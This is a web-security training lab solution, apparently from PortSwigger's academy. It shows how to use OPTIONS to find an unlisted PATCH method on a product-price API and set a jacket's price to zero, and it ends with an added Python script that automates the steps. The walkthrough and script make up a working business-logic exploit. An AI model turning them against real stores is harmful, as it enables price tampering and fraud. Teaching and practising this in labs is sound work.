Lab: Finding and exploiting an unused API endpoint

PRACTITIONER

To solve the lab, exploit a hidden API endpoint to buy a Lightweight l33t Leather Jacket. You can log in to your own account using the following credentials: wiener:peter.

Required knowledge

To solve this lab, you'll need to know:

  • How to use error messages to construct a valid request.
  • How HTTP methods are used by RESTful APIs.
  • How changing the HTTP method can reveal additional functionality.

These points are covered in our API Testing Academy topic.

Solution

  1. In Burp's browser, access the lab and click on a product.

  2. In Proxy > HTTP history, notice the API request for the product. For example, /api/products/3/price.

  3. Right-click the API request and select Send to Repeater.

  4. In the Repeater tab, change the HTTP method for the API request from GET to OPTIONS, then send the request. Notice that the response specifies that the GET and PATCH methods are allowed.

  5. Change the method for the API request from GET to PATCH, then send the request. Notice that you receive an Unauthorized message. This may indicate that you need to be authenticated to update the product's price via this endpoint.

  6. In Burp's browser, log in to the application using the credentials wiener:peter.

  7. Click on the Lightweight "l33t" Leather Jacket product.

  8. In Proxy > HTTP history, right-click the /api/products/1/price request for the leather jacket and select Send to Repeater.

  9. In the Repeater tab, change the method for the API request from GET to PATCH, then send the request. Notice that this causes an error due to an incorrect Content-Type. The error message specifies that the Content-Type should be application/json.

  10. Add a Content-Type header and set the value to application/json.

  11. Add an empty JSON object {} as the request body, then send the request. Notice that this causes an error due to the request body missing a price parameter.

  12. Add a price parameter with a value of 0 to the JSON object {"price":0}. Send the request.

  13. In Burp's browser, reload the leather jacket product page. Notice that the price of the leather jacket is now $0.00.

  14. Add the leather jacket to your basket.

  15. Go to your basket and click Place order to solve the lab.
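The same procedure can be scripted once the session cookie for wiener is known, which is useful for re-checking the endpoint or for testing other product IDs. The script below is an added example and is not PortSwigger's own code: it sends OPTIONS to discover the advertised methods, then sends a PATCH with a JSON body as the lab's error messages demand. The lab host name (LAB_HOST), the session cookie name (session), the LAB_SESSION environment variable and the exact error text are assumptions; the lab assigns its own host and the product ID may differ.

```python
"""Reproduce the lab steps with the Python standard library only.

Added example for this page, not PortSwigger's code. LAB_HOST, the cookie
name 'session' and the LAB_SESSION variable are assumptions.
"""
import json
import os
import urllib.error
import urllib.request

# Assumed: the lab hands out a unique host; export LAB_HOST to override.
LAB_HOST = os.environ.get("LAB_HOST", "https://YOUR-LAB-ID.web-security-academy.net")
PRODUCT_ID = 1  # the Lightweight "l33t" Leather Jacket in the lab


def parse_allow(header_value):
    """Turn an Allow header such as 'GET, PATCH' into a set of methods."""
    return {m.strip().upper() for m in header_value.split(",") if m.strip()}


def build_request(url, method, session=None, body=None):
    """Build the request Burp Repeater would send at each step.

    A JSON body automatically gets the Content-Type the lab insists on,
    and the body is serialised compactly ({"price":0}) as in the lab text.
    """
    headers = {}
    if session:
        headers["Cookie"] = f"session={session}"  # assumed cookie name
    data = None
    if body is not None:
        headers["Content-Type"] = "application/json"
        data = json.dumps(body, separators=(",", ":")).encode()
    return urllib.request.Request(url, data=data, headers=headers, method=method)


def send(req):
    """Send a request and return (status, headers, body), keeping 4xx/5xx."""
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, resp.headers, resp.read().decode(errors="replace")
    except urllib.error.HTTPError as e:
        return e.code, e.headers, e.read().decode(errors="replace")


def discover_methods(url, session=None):
    """Step 4: OPTIONS reveals which methods the endpoint accepts."""
    status, headers, _ = send(build_request(url, "OPTIONS", session))
    return status, parse_allow(headers.get("Allow", ""))


def set_price(url, price, session):
    """Steps 9-12: PATCH the price with a JSON body and the right Content-Type."""
    return send(build_request(url, "PATCH", session, {"price": price}))


def exploit(session):
    url = f"{LAB_HOST}/api/products/{PRODUCT_ID}/price"
    status, methods = discover_methods(url, session)
    print(f"OPTIONS -> {status}, Allow: {sorted(methods)}")
    if "PATCH" not in methods:
        raise SystemExit("PATCH not advertised; nothing to exploit here")
    # Step 5: without a session the lab rejects the update (Unauthorized).
    status, _, body = set_price(url, 0, None)
    print(f"PATCH without session -> {status}: {body.strip()}")
    # Steps 9-12: with wiener's session the price is overwritten.
    status, _, body = set_price(url, 0, session)
    print(f"PATCH with session    -> {status}: {body.strip()}")
    return status


if __name__ == "__main__":
    # Log in as wiener:peter in the browser first and copy the session cookie.
    exploit(os.environ["LAB_SESSION"])
```

After the script reports a successful PATCH, reload the product page, add the jacket to the basket and place the order as in steps 13 to 15; the script only changes the price, it does not complete the purchase.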
